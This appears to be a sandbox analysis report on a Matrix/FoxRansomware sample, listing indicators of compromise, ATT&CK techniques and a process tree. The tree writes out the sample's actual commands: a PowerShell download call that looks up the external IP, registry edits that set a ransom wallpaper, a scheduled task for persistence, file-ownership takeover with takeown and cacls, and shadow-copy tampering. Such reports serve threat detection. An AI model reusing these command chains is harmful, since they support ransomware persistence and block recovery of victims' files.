File opened (read-only)	\??\I:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\X:	dghZRO1Y64.exe
File opened (read-only)	\??\Y:	dghZRO1Y64.exe
File opened (read-only)	\??\S:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\L:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\P:	dghZRO1Y64.exe
File opened (read-only)	\??\Q:	dghZRO1Y64.exe
File opened (read-only)	\??\A:	dghZRO1Y64.exe
File opened (read-only)	\??\B:	dghZRO1Y64.exe
File opened (read-only)	\??\R:	dghZRO1Y64.exe
File opened (read-only)	\??\T:	dghZRO1Y64.exe
File opened (read-only)	\??\Z:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\Y:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\W:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\M:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened (read-only)	\??\P:	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe

Looks up external IP address via web service 1 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
8	myexternalip.com

Drops file in System32 directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-406356229-2805545415-1236085040-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\XDKwKfYo.bmp"	reg.exe

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Pacific\Marquesas	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Solstice.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH03224I.JPG	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02068_.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01039_.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Google\Chrome\Application\106.0.5249.119\v8_context_snapshot.bin	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\add_reviewer.gif	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01354_.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\LICENSE	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-multitabs.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099197.GIF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0105272.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jre7\lib\net.properties	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0151041.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO01561_.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Hermosillo	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsStyles\Desert.css	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.core.services_1.2.1.v20140808-1251.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0241043.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Asia\Qyzylorda	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.browser.attach.zh_CN_5.5.0.165303.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.e4.rcp_1.3.100.v20141007-2033\META-INF\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PAGESIZE\PGLBL002.XML	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\INVITE11.POC	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\WebToolIconImages.jpg	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\SettingsInternal.zip	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-jvm.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\lib\locale\org-openide-modules_ja.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01213K.JPG	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jetty.server_8.1.14.v20131031.jar	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\sq\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0233018.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD21298_.GIF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\messages_fr.properties	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\lua\http\js\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\Google\Chrome\Application\106.0.5249.119\VisualElements\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD01084_.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00343_.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0102594.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\bg_OliveGreen.gif	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Asuncion	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\RTF_BOLD.GIF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\AcroForm\PMP\QRCode.pmp	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0198022.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Newsprint.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0301432.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\GrooveForms5\FormsStyles\rtf_spellcheck.gif	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.syntheticnotification.exsd	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\7-Zip\Lang\ga.txt	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\AST4	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0185786.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0187837.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File created	C:\Program Files\VideoLAN\VLC\locale\fur\LC_MESSAGES\#FOX_README#.rtf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterRegular.ttf	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsHomePageStyle.css	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Equity.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Danmarkshavn	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0296288.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0107452.WMF	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Opulent.xml	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Computers\computericon.jpg	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
2984	schtasks.exe

Interacts with shadow copies 2 TTPs 2 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1070.004

Inhibit System Recovery

T1490

pid	Process
4444	vssadmin.exe
4840	vssadmin.exe

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
2688	powershell.exe
2928	dghZRO1Y64.exe
2928	dghZRO1Y64.exe
2928	dghZRO1Y64.exe
4704	powershell.exe
4704	powershell.exe
4704	powershell.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
2928	dghZRO1Y64.exe

Suspicious use of AdjustPrivilegeToken 47 IoCs

description	pid	Process
Token: SeDebugPrivilege	2688	powershell.exe
Token: SeDebugPrivilege	2928	dghZRO1Y64.exe
Token: SeLoadDriverPrivilege	2928	dghZRO1Y64.exe
Token: SeBackupPrivilege	4348	vssvc.exe
Token: SeRestorePrivilege	4348	vssvc.exe
Token: SeAuditPrivilege	4348	vssvc.exe
Token: SeIncreaseQuotaPrivilege	2408	WMIC.exe
Token: SeSecurityPrivilege	2408	WMIC.exe
Token: SeTakeOwnershipPrivilege	2408	WMIC.exe
Token: SeLoadDriverPrivilege	2408	WMIC.exe
Token: SeSystemProfilePrivilege	2408	WMIC.exe
Token: SeSystemtimePrivilege	2408	WMIC.exe
Token: SeProfSingleProcessPrivilege	2408	WMIC.exe
Token: SeIncBasePriorityPrivilege	2408	WMIC.exe
Token: SeCreatePagefilePrivilege	2408	WMIC.exe
Token: SeBackupPrivilege	2408	WMIC.exe
Token: SeRestorePrivilege	2408	WMIC.exe
Token: SeShutdownPrivilege	2408	WMIC.exe
Token: SeDebugPrivilege	2408	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2408	WMIC.exe
Token: SeRemoteShutdownPrivilege	2408	WMIC.exe
Token: SeUndockPrivilege	2408	WMIC.exe
Token: SeManageVolumePrivilege	2408	WMIC.exe
Token: 33	2408	WMIC.exe
Token: 34	2408	WMIC.exe
Token: 35	2408	WMIC.exe
Token: SeIncreaseQuotaPrivilege	2408	WMIC.exe
Token: SeSecurityPrivilege	2408	WMIC.exe
Token: SeTakeOwnershipPrivilege	2408	WMIC.exe
Token: SeLoadDriverPrivilege	2408	WMIC.exe
Token: SeSystemProfilePrivilege	2408	WMIC.exe
Token: SeSystemtimePrivilege	2408	WMIC.exe
Token: SeProfSingleProcessPrivilege	2408	WMIC.exe
Token: SeIncBasePriorityPrivilege	2408	WMIC.exe
Token: SeCreatePagefilePrivilege	2408	WMIC.exe
Token: SeBackupPrivilege	2408	WMIC.exe
Token: SeRestorePrivilege	2408	WMIC.exe
Token: SeShutdownPrivilege	2408	WMIC.exe
Token: SeDebugPrivilege	2408	WMIC.exe
Token: SeSystemEnvironmentPrivilege	2408	WMIC.exe
Token: SeRemoteShutdownPrivilege	2408	WMIC.exe
Token: SeUndockPrivilege	2408	WMIC.exe
Token: SeManageVolumePrivilege	2408	WMIC.exe
Token: 33	2408	WMIC.exe
Token: 34	2408	WMIC.exe
Token: 35	2408	WMIC.exe
Token: SeDebugPrivilege	4704	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2168 wrote to memory of 3052	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	29
PID 2168 wrote to memory of 3052	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	29
PID 2168 wrote to memory of 3052	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	29
PID 2168 wrote to memory of 3052	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	29
PID 2168 wrote to memory of 2632	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	31
PID 2168 wrote to memory of 2632	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	31
PID 2168 wrote to memory of 2632	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	31
PID 2168 wrote to memory of 2632	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	31
PID 2168 wrote to memory of 2692	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	33
PID 2168 wrote to memory of 2692	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	33
PID 2168 wrote to memory of 2692	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	33
PID 2168 wrote to memory of 2692	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	33
PID 2692 wrote to memory of 2688	2692	cmd.exe	35
PID 2692 wrote to memory of 2688	2692	cmd.exe	35
PID 2692 wrote to memory of 2688	2692	cmd.exe	35
PID 2692 wrote to memory of 2688	2692	cmd.exe	35
PID 2168 wrote to memory of 2308	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	36
PID 2168 wrote to memory of 2308	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	36
PID 2168 wrote to memory of 2308	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	36
PID 2168 wrote to memory of 2308	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	36
PID 2168 wrote to memory of 2768	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	37
PID 2168 wrote to memory of 2768	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	37
PID 2168 wrote to memory of 2768	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	37
PID 2168 wrote to memory of 2768	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	37
PID 2308 wrote to memory of 1096	2308	cmd.exe	40
PID 2308 wrote to memory of 1096	2308	cmd.exe	40
PID 2308 wrote to memory of 1096	2308	cmd.exe	40
PID 2308 wrote to memory of 1096	2308	cmd.exe	40
PID 2308 wrote to memory of 2756	2308	cmd.exe	41
PID 2308 wrote to memory of 2756	2308	cmd.exe	41
PID 2308 wrote to memory of 2756	2308	cmd.exe	41
PID 2308 wrote to memory of 2756	2308	cmd.exe	41
PID 2768 wrote to memory of 2312	2768	cmd.exe	42
PID 2768 wrote to memory of 2312	2768	cmd.exe	42
PID 2768 wrote to memory of 2312	2768	cmd.exe	42
PID 2768 wrote to memory of 2312	2768	cmd.exe	42
PID 2308 wrote to memory of 2004	2308	cmd.exe	43
PID 2308 wrote to memory of 2004	2308	cmd.exe	43
PID 2308 wrote to memory of 2004	2308	cmd.exe	43
PID 2308 wrote to memory of 2004	2308	cmd.exe	43
PID 2168 wrote to memory of 2588	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	44
PID 2168 wrote to memory of 2588	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	44
PID 2168 wrote to memory of 2588	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	44
PID 2168 wrote to memory of 2588	2168	0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe	44
PID 2588 wrote to memory of 2680	2588	cmd.exe	46
PID 2588 wrote to memory of 2680	2588	cmd.exe	46
PID 2588 wrote to memory of 2680	2588	cmd.exe	46
PID 2588 wrote to memory of 2680	2588	cmd.exe	46
PID 2588 wrote to memory of 2436	2588	cmd.exe	47
PID 2588 wrote to memory of 2436	2588	cmd.exe	47
PID 2588 wrote to memory of 2436	2588	cmd.exe	47
PID 2588 wrote to memory of 2436	2588	cmd.exe	47
PID 2312 wrote to memory of 1132	2312	wscript.exe	48
PID 2312 wrote to memory of 1132	2312	wscript.exe	48
PID 2312 wrote to memory of 1132	2312	wscript.exe	48
PID 2312 wrote to memory of 1132	2312	wscript.exe	48
PID 2588 wrote to memory of 1984	2588	cmd.exe	50
PID 2588 wrote to memory of 1984	2588	cmd.exe	50
PID 2588 wrote to memory of 1984	2588	cmd.exe	50
PID 2588 wrote to memory of 1984	2588	cmd.exe	50
PID 1132 wrote to memory of 2984	1132	cmd.exe	51
PID 1132 wrote to memory of 2984	1132	cmd.exe	51
PID 1132 wrote to memory of 2984	1132	cmd.exe	51
PID 1132 wrote to memory of 2984	1132	cmd.exe	51

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Uses Volume Shadow Copy service COM API
The Volume Shadow Copy service is used to manage backups/snapshots.
ransomware

Views/modifies file attributes 1 TTPs 1 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2680	attrib.exe

C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe"
1⤵
- Matrix Ransomware
- Loads dropped DLL
- Enumerates connected drives
- Drops file in Program Files directory
- Suspicious use of WriteProcessMemory
PID:2168
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C copy /V /Y "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe" "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWBuRTjd.exe"
  2⤵
  PID:3052
- C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWBuRTjd.exe
  "C:\Users\Admin\AppData\Local\Temp\FoxRansomware\NWBuRTjd.exe" -n
  2⤵
  - Executes dropped EXE
  PID:2632
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')">"C:\Users\Admin\AppData\Local\Temp\FoxRansomware\kIOKkoKp.txt"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2692
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    powershell "$webClient = New-Object -TypeName System.Net.WebClient; $webClient.DownloadString('http://myexternalip.com/raw')"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2688
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\XDKwKfYo.bmp" /f & reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f & reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2308
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d "C:\Users\Admin\AppData\Roaming\XDKwKfYo.bmp" /f
    3⤵
    - Sets desktop wallpaper using registry
    PID:1096
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v WallpaperStyle /t REG_SZ /d "0" /f
    3⤵
    PID:2756
- - C:\Windows\SysWOW64\reg.exe
    reg add "HKCU\Control Panel\Desktop" /v TileWallpaper /t REG_SZ /d "0" /f
    3⤵
    PID:2004
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /C wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\vnIhreog.vbs"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2768
- - C:\Windows\SysWOW64\wscript.exe
    wscript //B //Nologo "C:\Users\Admin\AppData\Roaming\vnIhreog.vbs"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:2312
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\F6YtAyD6.bat" /sc minute /mo 5 /RL HIGHEST /F
      4⤵
      Suspicious use of WriteProcessMemory
      PID:1132
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Create /tn DSHCA /tr "C:\Users\Admin\AppData\Roaming\F6YtAyD6.bat" /sc minute /mo 5 /RL HIGHEST /F
        5⤵
        Creates scheduled task(s)
        
        PID:2984
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /C schtasks /Run /I /tn DSHCA
      4⤵
      PID:1444
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /Run /I /tn DSHCA
        5⤵
        
        PID:2064
- C:\Windows\SysWOW64\cmd.exe
  cmd /c ""C:\Users\Admin\AppData\Local\Temp\FoxRansomware\3F0OFZk1.bat" "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf""
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2588
- - C:\Windows\SysWOW64\attrib.exe
    attrib -R -A -S "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
    3⤵
    - Views/modifies file attributes
    PID:2680
- - C:\Windows\SysWOW64\cacls.exe
    cacls "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf" /E /G Admin:F /C
    3⤵
    PID:2436
- - C:\Windows\SysWOW64\takeown.exe
    takeown /F "C:\Program Files (x86)\Adobe\Reader 9.0\Resource\ENUtxt.pdf"
    3⤵
    - Modifies file permissions
    PID:1984
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c dghZRO1Y.exe -accepteula "ENUtxt.pdf" -nobanner
    3⤵
    - Loads dropped DLL
    PID:880
  - - C:\Users\Admin\AppData\Local\Temp\FoxRansomware\dghZRO1Y.exe
      dghZRO1Y.exe -accepteula "ENUtxt.pdf" -nobanner
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:1800
    - - C:\Users\Admin\AppData\Local\Temp\dghZRO1Y64.exe
        
        dghZRO1Y.exe -accepteula "ENUtxt.pdf" -nobanner
